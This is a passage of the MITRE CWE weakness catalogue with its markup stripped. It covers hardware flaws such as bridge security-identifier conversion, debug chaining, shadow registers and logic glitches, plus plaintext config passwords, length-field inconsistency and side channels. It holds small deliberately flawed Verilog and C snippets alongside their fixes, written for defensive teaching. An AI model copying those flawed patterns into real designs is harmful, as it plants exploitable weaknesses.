writes). - A typical bus connects several leader and follower agents. Some follower agents implement bus protocols differently from leader agents. A protocol conversion happens at a bridge to seamlessly connect different protocols on the bus. One example is a system that implements a leader with the Advanced High-performance Bus (AHB) protocol and a follower with the Open-Core Protocol (OCP). A bridge AHB-to-OCP is needed to translate the transaction from one form to the other. - A common weakness that can exist in this scenario is that this conversion between protocols is implemented incorrectly, whereupon an untrusted agent may gain unauthorized access to an asset. - - - - - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases. - - - Implementation - Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases. - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Memory - Read Memory - DoS: Resource Consumption (Other) - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Quality Degradation - High - - - - - Architecture and Design - Security identifier decoders must be reviewed for design inconsistency and common weaknesses. - - - Implementation - Access and programming flows must be tested in pre-silicon and post-silicon testing. - - - - - - - Consider a system that supports AHB. Let us assume we have a follower agent that only understands OCP. To connect this follower to the leader, a bridge is introduced, i.e., AHB to OCP. - - - The follower has assets to protect accesses from untrusted leaders, and it employs access controls based on policy, (e.g., AES-Key registers for encryption or decryption). The key is 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls. - - - The AES_KEY_ACCESS_POLICY access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The implemented AES_KEY_ACCESS_POLICY has 4 bits where each bit when “Set” allows access to the AES-Key registers to the corresponding agent that has the security identifier. The other bits from 31 through 4 are reserved and not used. - - - - - Register - - - Field Description - - - - - AES_ENC_DEC_KEY_0 - - - AES key [0:31] for encryption or decryption Default 0x00000000 - - - - - AES_ENC_DEC_KEY_1 - - - AES key [32:63] for encryption or decryption Default 0x00000000 - - - - - AES_ENC_DEC_KEY_2 - - - AES key [64:95] for encryption or decryption Default 0x00000000 - - - - - AES_ENC_DEC_KEY_3 - - - AES key [96:127] for encryption or decryption Default 0x00000000 - - - - - AES_KEY_ACCESS_POLICY - - - [31:4] Default 0x000000 [3:0] – 0x02 agent with Security Identifier “1” has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers - - - - - During conversion of the AHB-to-OCP transaction, the security identifier information must be preserved and passed on to the follower correctly. - - - - In AHB-to-OCP bridge, the security identifier information conversion is done incorrectly. - - Because of the incorrect conversion, the security identifier information is either lost or could be modified in such a way that an untrusted leader can access the AES-Key registers. - The conversion of the signals from one protocol (AHB) to another (OCP) must be done while preserving the security identifier correctly. - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-04-29 - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The software relies on one source of data, preventing the ability to detect if an adversary has compromised a data source. - - Software has to implicitly trust the integrity of an information source. When information is implicitly signed, one can ensure that the data was not tampered in transit. This does not ensure that the information source was not compromised when responding to a request. By requesting information from multiple sources, one can check if all of the data is the same. If they are not, the system should report the information sources that respond with a different or minority value as potentially compromised. If there are not enough answers to provide a majority or plurality of responses, the system should report all of the sources as potentially compromised. As the seriousness of the impact of incorrect integrity increases, so should the number of independent information sources that would need to be queried. - - - - - - - - - - - - - - Architecture and Design - This flaw could be introduced during the design of the application or misconfiguration at run time by only specifying a single point of validation. - - - Implementation - Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases. - - - Operation - This weakness could be introduced by intentionally failing all but one of the devices used to retrieve the data or by failing the devices that validate the data. - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - Gain Privileges or Assume Identity - An attacker that may be able to execute a single Person-in-the-Middle attack can subvert a check of an external oracle (e.g. the ACME protocol check for a file on a website), and thus inject an arbitrary reply to the single perspective request to the external oracle. - - - - - Requirements - Design system to use a Practical Byzantine fault method, to request information from multiple sources to verify the data and report on potentially compromised information sources. - - - Implementation - Failure to use a Practical Byzantine fault method when requesting data. Lack of place to report potentially compromised information sources. Relying on non-independent information sources for integrity checking. Failure to report information sources that respond in the minority to incident response procedures. - - - - - - - - - - Kurt Seifried - Cloud Security Alliance - 2020-04-03 - - - CWE Content Team - MITRE - 2020-12-10 - updated Description, Relationships - - - - - The System-on-Chip (SoC) implements a Security Identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Identifiers are not correctly implemented. - - Systems-On-Chip (Integrated circuits and hardware - engines) implement Security Identifiers to - differentiate/identify actions originated from various - agents. These actions could be 'read', 'write', 'program', - 'reset', 'fetch', 'compute', etc. Security identifiers are - generated and assigned to every agent in the System (SoC) - that is either capable of generating an action or receiving - an action from another agent. Every agent could be assigned - a unique, Security Identifier based on its trust level or - privileges. - A broad class of flaws can exist in the Security - Identifier process, including but not limited to missing - security identifiers, improper conversion of security - identifiers, incorrect generation of security identifiers, - etc. - - - - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases. - - - Implementation - Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases. - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Memory - Read Memory - DoS: Resource Consumption (Other) - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Quality Degradation - High - - - - - Architecture and Design - Security Identifier Decoders must be reviewed for design inconsistency and common weaknesses. - - - Implementation - Access and programming flows must be tested in pre-silicon and post-silicon testing. - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - CWE Content Team - MITRE - 2020-07-17 - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The product fails to adequately prevent the revealing of unnecessary and potentially sensitive system information within debugging messages. - - Debug messages are messages that help troubleshoot an issue by revealing the internal state of the system. For example, debug data in design can be exposed through internal memory array dumps or boot logs through interfaces like UART via TAP commands, scan chain, etc. Thus, the more information contained in a debug message, the easier it is to debug. However, there is also the risk of revealing information that could help an attacker either decipher a vulnerability, and/or gain a better understanding of the system. Thus, this extra information could lower the “security by obscurity” factor. While “security by obscurity” alone is insufficient, it can help as a part of “Defense-in-depth”. - - - - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Access Control - Accountability - Authentication - Authorization - Non-Repudiation - Read Memory - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Varies by Context - Medium - - - - - Implementation - Ensure that a debug message does not reveal any unnecessary information during the debug process for the intended response. - - - - - This example here shows how an attacker can take advantage of unnecessary information in debug messages. - Example 1: Suppose in response to a Test Access Port (TAP) chaining request the debug message also reveals the current TAP hierarchy (the full topology) in addition to the success/failure message. - Example 2: In response to a password-filling request, the debug message, instead of a simple Granted/Denied response, prints an elaborate message, “The user-entered password does not match the actual password stored in <directory name>.” - The result of the above examples is that the user is able to gather additional unauthorized information about the system from the debug messages. - The solution is to ensure that Debug messages do not reveal additional details. - - - - - CVE-2017-18326 - modem debug messages include cryptographic keys - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18326 - - - - - - - - - - - Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi - Intel Corporation - 2020-05-31 - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples, Related_Attack_Patterns, Relationships - - - - - The product's debug components contain incorrect chaining or granularity of debug components. - - For debugging and troubleshooting a chip, several hardware design elements are often implemented, including: - - Various Test Access Ports (TAPs) allow boundary scan commands to be executed. - For scanning the internal components of a chip, there are scan cells that allow the chip to be used as a "stimulus and response" mechanism. - Chipmakers might create custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs. - - Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could allow unintended access permissions. - - - - - - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Authentication - Authorization - Availability - Accountability - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Execute Unauthorized Code or Commands - Modify Memory - Modify Files or Directories - Medium - Depending on the access to debug component(s) erroneously granted, an attacker could use the debug component to gain additional understanding about the system to further an attack and/or execute other commands. This could compromise any security property, including the ones listed above. - - - - - Architecture or Design Review - Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials. - High - - - Dynamic Analysis with Manual Results Interpretation - Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials. - High - - - - - Implementation - Ensure that debug components are properly chained and their granularity is maintained at different authentication levels. - - - - - The following example shows how an attacker can take advantage of incorrect chaining or missing granularity of debug components. - In a System-on-Chip (SoC), the user might be able to access the SoC-level TAP with a certain level of authorization. However, this access should not also grant access to all of the internal TAPs (e.g., Core). Separately, if any of the internal TAPs is also stitched to the TAP chain when it should not be because of a logic error, then an attacker can access the internal TAPs as well and execute commands there. - As a related example, suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.). Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented and the attacker can gain unauthorized access. - - - - - CVE-2017-18347 - Incorrect access control in RDP Level 1 on STMicroelectronics STM32F0 series devices allows physically present attackers to extract the device's protected firmware via a special sequence of Serial Wire Debug (SWD) commands because there is a race condition between full initialization of the SWD interface and the setup of flash protection. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18347 - - - CVE-2020-1791 - There is an improper authorization vulnerability in several smartphones. The system has a logic-judging error, and, under certain scenarios, a successful exploit could allow the attacker to switch to third desktop after a series of operations in ADB mode. (Vulnerability ID: HWPSIRT-2019-10114). - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1791 - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-05-31 - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The product does not adequately protect confidential information on the device from being accessed by Outsourced Semiconductor Assembly and Test (OSAT) vendors. - - In contrast to complete vertical integration of architecting, designing, manufacturing, assembling, and testing chips all within a single organization, an organization can choose to simply architect and design a chip before outsourcing the rest of the process to OSAT entities (e.g., external foundries and test houses). In the latter example, the device enters an OSAT facility in a much more vulnerable pre-production stage where many debug and test modes are accessible. Therefore, the chipmaker must place a certain level of trust with the OSAT. To counter this, the chipmaker often requires the OSAT partner to enter into restrictive non-disclosure agreements (NDAs). Nonetheless, OSAT vendors likely have many customers, which increases the risk of accidental sharing of information. There may also be a security vulnerability in the information technology (IT) system of the OSAT facility. Alternatively, a malicious insider at the OSAT facility may carry out an insider attack. Considering these factors, it behooves the chipmaker to minimize any confidential information in the device that may be accessible to the OSAT vendor. - Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could provide improper authorization to sensitive information. - - - - - - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Authentication - Authorization - Availability - Accountability - Non-Repudiation - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Execute Unauthorized Code or Commands - Modify Memory - Modify Files or Directories - Medium - The impact depends on the confidential information itself and who is inadvertently granted access. For example, if the confidential information is a key that can unlock all the parts of a generation, the impact could be severe. - - - - - Architecture or Design Review - Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility. - High - - - Dynamic Analysis with Manual Results Interpretation - Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility. - Moderate - - - - - Architecture and Design - - - • Ensure that when an OSAT vendor is allowed to access test interfaces necessary for preproduction and returned parts, the vendor only pulls the minimal information necessary. Also, architect the product in such a way that, when an “unlock device” request comes, it only unlocks that specific part and not all the parts for that product line. - • Ensure that the product’s non-volatile memory (NVM) is scrubbed of all confidential information and secrets before handing it over to an OSAT. - • Arrange to secure all communication between an OSAT facility and the chipmaker. - - - Moderate - - - - - - The following example shows how an attacker can take advantage of a piece of confidential information that has not been protected from the OSAT. - Suppose the preproduction device contains NVM (a storage medium that by definition/design can retain its data without power), and this NVM contains a key that can unlock all the parts for that generation. An OSAT facility accidentally leaks the key. - Compromising a key that can unlock all the parts of a generation can be devastating to a chipmaker. - The likelihood of such a compromise can be reduced by ensuring all memories on the preproduction device are properly scrubbed. - - - - - - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-05-29 - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - A race condition in the hardware logic results in undermining security guarantees of the system. - - A race condition in logic circuits typically occurs when a logic gate gets inputs from signals that have traversed different paths while originating from the same source. Such inputs to the gate can change at slightly different times in response to a change in the source signal. This results in a timing error or a glitch (temporary or permanent) that causes the output to change to an unwanted state before settling back to the desired state. If such timing errors occur in access control logic or finite state machines that are implemented in security sensitive flows, an attacker might exploit them to circumvent existing protections. - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Alter Execution Logic - - - - - Architecture and Design - Adopting design practices that encourage designers to recognize and eliminate race conditions, such as Karnaugh maps, could result in the decrease in occurrences of race conditions. - - - Implementation - Logic redundancy can be implemented along security critical paths to prevent race conditions. To avoid metastability, it is a good practice in general to default to a secure state in which access is not given to untrusted agents. - - - - - The code below shows a 2x1 multiplexor using logic gates. Though the code shown below results in the minimum gate solution, it is disjoint and causes glitches. - - // 2x1 Multiplexor using logic-gates - - module glitchEx( - - input wire in0, in1, sel, - output wire z - - ); - - wire not_sel; - wire and_out1, and_out2; - - assign not_sel = ~sel; - assign and_out1 = not_sel & in0; - assign and_out2 = sel & in1; - - // Buggy line of code: - assign z = and_out1 | and_out2; // glitch in signal z - - endmodule - - The buggy line of code, commented above, results in signal 'z' periodically changing to an unwanted state. Thus, any logic that references signal 'z' may access it at a time when it is in this unwanted state. This line should be replaced with the line shown below in the Good Code Snippet which results in signal 'z' remaining in a continuous, known, state. Reference for the above code, along with waveforms for simulation can be found in the references below. - - assign z <= and_out1 or and_out2 or (in0 and in1); - - This line of code removes the glitch in signal z. - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-10 - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The lack of protections on alternate paths to access - control-protected assets (such as unprotected shadow registers - and other external facing unguarded interfaces) allows an - attacker to bypass existing protections to the asset that are - only performed against the primary path. - - An asset inside a chip might have access-control - protections through one interface. However, if all paths to - the asset are not protected, an attacker might compromise - the asset through alternate paths. These alternate paths - could be through shadow or mirror registers inside the IP - core, or could be paths from other external-facing - interfaces to the IP core or SoC. - Consider an SoC with various interfaces such as UART, - SMBUS, PCIe, USB, etc. If access control is implemented for - SoC internal registers only over the PCIe interface, then - an attacker could still modify the SoC internal registers - through alternate paths by coming through interfaces such - as UART, SMBUS, USB, etc. - Alternatively, attackers might be able to bypass - existing protections by exploiting unprotected, shadow - registers. Shadow registers and mirror registers typically - refer to registers that can be accessed from multiple - addresses. Writing to or reading from the aliased/mirrored - address has the same effect as writing to the address of - the main register. They are typically implemented within an - IP core or SoC to temporarily hold certain data. These data - will later be updated to the main register, and both - registers will be in synch. If the shadow registers are not - access-protected, attackers could simply initiate - transactions to the shadow registers and compromise system - security. - - - - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Memory - Read Memory - DoS: Resource Consumption (Other) - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Quality Degradation - High - - - - - Requirements - Protect assets from accesses against all potential interfaces and alternate paths. - Defense in Depth - - - Architecture and Design - Protect assets from accesses against all potential interfaces and alternate paths. - Defense in Depth - - - Implementation - Protect assets from accesses against all potential interfaces and alternate paths. - Defense in Depth - - - - - - - Register SECURE_ME is located at address 0xF00. A - mirror of this register called COPY_OF_SECURE_ME is - at location 0x800F00. The register SECURE_ME is - protected from malicious agents and only allows - access to select, while COPY_OF_SECURE_ME is not. - - - Access control is implemented using an allowlist (as - indicated by acl_oh_allowlist). The identity of the - initiator of the transaction is indicated by the - one hot input, incoming_id. This is checked against - the acl_oh_allowlist (which contains a list of - initiators that are allowed to access the asset). - - - Though this example is shown in Verilog, it will - apply to VHDL as well. - - - - module foo_bar(data_out, data_in, incoming_id, address, clk, rst_n); - output [31:0] data_out; - input [31:0] data_in, incoming_id, address; - input clk, rst_n; - wire write_auth, addr_auth; - reg [31:0] data_out, acl_oh_allowlist, q; - assign write_auth = | (incoming_id & acl_oh_allowlist) ? 1 : 0; - always @* - - acl_oh_allowlist <= 32’h8312; - - assign addr_auth = (address == 32’hF00) ? 1: 0; - always @ (posedge clk or negedge rst_n) - - if (!rst_n) - - begin - - q <= 32’h0; - data_out <= 32’h0; - - end - - else - - begin - - q <= (addr_auth & write_auth) ? data_in: q; - data_out <= q; - - end - - end - - endmodule - - assign addr_auth = (address == 32’hF00) ? 1: 0; - The bugged line of code is repeated in the Bad - example above. Weakness arises from the fact that the - SECURE_ME register can be modified by writing to the - shadow register COPY_OF_SECURE_ME, the address of - COPY_OF_SECURE_ME should also be included in the check. - That buggy line of code should instead be replaced as - shown in the Good Code Snippet below. - - assign addr_auth = (address == 32’hF00 || address == 32’h800F00) ? 1: 0; - - - - - CVE-2017-18293 - When GPIO is protected by blocking access - to corresponding GPIO resource registers, - protection can be bypassed by writing to the - corresponding banked GPIO registers instead. - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18293 - - - CVE-2020-15483 - monitor device allows access to physical UART debug port without authentication - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15483 - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-10-02 - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples, Related_Attack_Patterns - - - - - Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers. - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - - - - - Implementation - Credentials stored in configuration files should be encrypted, Use standard APIs and industry accepted algorithms to encrypt the credentials stored in configuration files. - - - - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database, but the pair is stored in plaintext. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - Username and password information should not be included in a configuration file or a properties file in plaintext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. - - - - - ASP.NET Misconfiguration: Password in Configuration File - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software parses a formatted message or structure, but it does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data. - If an attacker can manipulate the length parameter associated with an input such that it is inconsistent with the actual length of the input, this can be leveraged to cause the target application to behave in unexpected, and possibly, malicious ways. One of the possible motives for doing so is to pass in arbitrarily large input to the application. Another possible motivation is the modification of application state by including invalid data for subsequent properties of the application. Such weaknesses commonly lead to attacks such as buffer overflows and execution of arbitrary code. - - - - - - - - - Primary - - - - - - - - - - length manipulation - - - length tampering - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Read Memory - Modify Memory - Varies by Context - - - - - Implementation - When processing structured incoming data containing a size field followed by raw data, ensure that you identify and resolve any inconsistencies between the size field and the actual size of the data. - - - Implementation - Do not let the user control the size of the buffer. - - - Implementation - Validate that the length of the user-supplied data is consistent with the buffer size. - - - - - In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing. - - int processMessageFromSocket(int socket) { - int success; - char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE]; - - // get message from socket and store into buffer - - - //Ignoring possibliity that buffer > BUFFER_SIZE - if (getMessage(socket, buffer, BUFFER_SIZE) > 0) { - - - // place contents of the buffer into message structure - ExMessage *msg = recastBuffer(buffer); - - // copy message body into string for processing - int index;for (index = 0; index < msg->msgLength; index++) {message[index] = msg->msgBody[index];}message[index] = '\0'; - - // process message - success = processMessage(message); - }return success; - } - - However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130). - - - - - CVE-2014-0160 - Chain: "Heartbleed" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 - - - CVE-2009-2299 - Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2299 - - - CVE-2001-0825 - Buffer overflow in internal string handling routine allows remote attackers to execute arbitrary commands via a length argument of zero or less, which disables the length check. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0825 - - - CVE-2001-1186 - Web server allows remote attackers to cause a denial of service via an HTTP request with a content-length value that is larger than the size of the request, which prevents server from timing out the connection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1186 - - - CVE-2001-0191 - Service does not properly check the specified length of a cookie, which allows remote attackers to execute arbitrary commands via a buffer overflow, or brute force authentication by using a short cookie length. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0191 - - - CVE-2003-0429 - Traffic analyzer allows remote attackers to cause a denial of service and possibly execute arbitrary code via invalid IPv4 or IPv6 prefix lengths, possibly triggering a buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0429 - - - CVE-2000-0655 - Chat client allows remote attackers to cause a denial of service or execute arbitrary commands via a JPEG image containing a comment with an illegal field length of 1. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0655 - - - CVE-2004-0492 - Server allows remote attackers to cause a denial of service and possibly execute arbitrary code via a negative Content-Length HTTP header field causing a heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0492 - - - CVE-2004-0201 - Help program allows remote attackers to execute arbitrary commands via a heap-based buffer overflow caused by a .CHM file with a large length field - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0201 - - - CVE-2003-0825 - Name services does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. Can overlap zero-length issues - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0825 - - - CVE-2004-0095 - Policy manager allows remote attackers to cause a denial of service (memory consumption and crash) and possibly execute arbitrary code via an HTTP POST request with an invalid Content-Length value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0095 - - - CVE-2004-0826 - Heap-based buffer overflow in library allows remote attackers to execute arbitrary code via a modified record length field in an SSLv2 client hello message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0826 - - - CVE-2004-0808 - When domain logons are enabled, server allows remote attackers to cause a denial of service via a SAM_UAS_CHANGE request with a length value that is larger than the number of structures that are provided. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0808 - - - CVE-2002-1357 - Multiple SSH2 servers and clients do not properly handle packets or data elements with incorrect length specifiers, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1357 - - - CVE-2004-0774 - Server allows remote attackers to cause a denial of service (CPU and memory exhaustion) via a POST request with a Content-Length header set to -1. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0774 - - - CVE-2004-0989 - Multiple buffer overflows in xml library that may allow remote attackers to execute arbitrary code via long URLs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0989 - - - CVE-2004-0568 - Application does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0568 - - - CVE-2003-0327 - Server allows remote attackers to cause a denial of service via a remote password array with an invalid length, which triggers a heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0327 - - - CVE-2003-0345 - Product allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0345 - - - CVE-2004-0430 - Server allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length field. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0430 - - - CVE-2005-0064 - PDF viewer allows remote attackers to execute arbitrary code via a PDF file with a large /Encrypt /Length keyLength value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0064 - - - CVE-2004-0413 - SVN client trusts the length field of SVN protocol URL strings, which allows remote attackers to cause a denial of service and possibly execute arbitrary code via an integer overflow that leads to a heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0413 - - - CVE-2004-0940 - Is effectively an accidental double increment of a counter that prevents a length check conditional from exiting a loop. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940 - - - CVE-2002-1235 - Length field of a request not verified. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1235 - - - CVE-2005-3184 - Buffer overflow by modifying a length value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3184 - - - SECUNIA:18747 - Length field inconsistency crashes cell phone. - http://secunia.com/advisories/18747/ - - - - - Length Parameter Inconsistency - - - - - - - This probably overlaps other categories including zero-length issues. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-12-28 - updated Observed_Examples - - - CWE Content Team - MITRE - 2010-02-16 - updated Description, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Type - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Type - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences, Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Length Parameter Inconsistency - Failure to Handle Length Parameter Inconsistency - - - - - The device does not contain sufficient protection - mechanisms to prevent physical side channels from exposing - sensitive information due to patterns in physically observable - phenomena such as variations in power consumption, - electromagnetic emissions (EME), or acoustic emissions. - - - An adversary could monitor and measure physical - phenomena to detect patterns and make inferences, even if it - is not possible to extract the information in the digital - domain. - Physical side channels have been well-studied for - decades in the context of breaking implementations of - cryptographic algorithms or other attacks against security - features. These side channels may be easily observed by an - adversary with physical access to the device, or using a - tool that is in close proximity. If the adversary can - monitor hardware operation and correlate its data processing - with power, EME, and acoustic measurements, the adversary - might be able to recover of secret keys and data. - - - - - - - - Primary - - - Resultant - - - - - - - - - - - Implementation - - - - - Confidentiality - Read Memory - Read Application Data - - - - - Manual Analysis - Perform a set of leakage detection tests such as the procedure outlined in the Test Vector Leakage Assessment (TVLA) test requirements for AES [REF-1230]. TVLA is the basis for the ISO standard 17825 [REF-1229]. A separate methodology is provided by [REF-1228]. Note 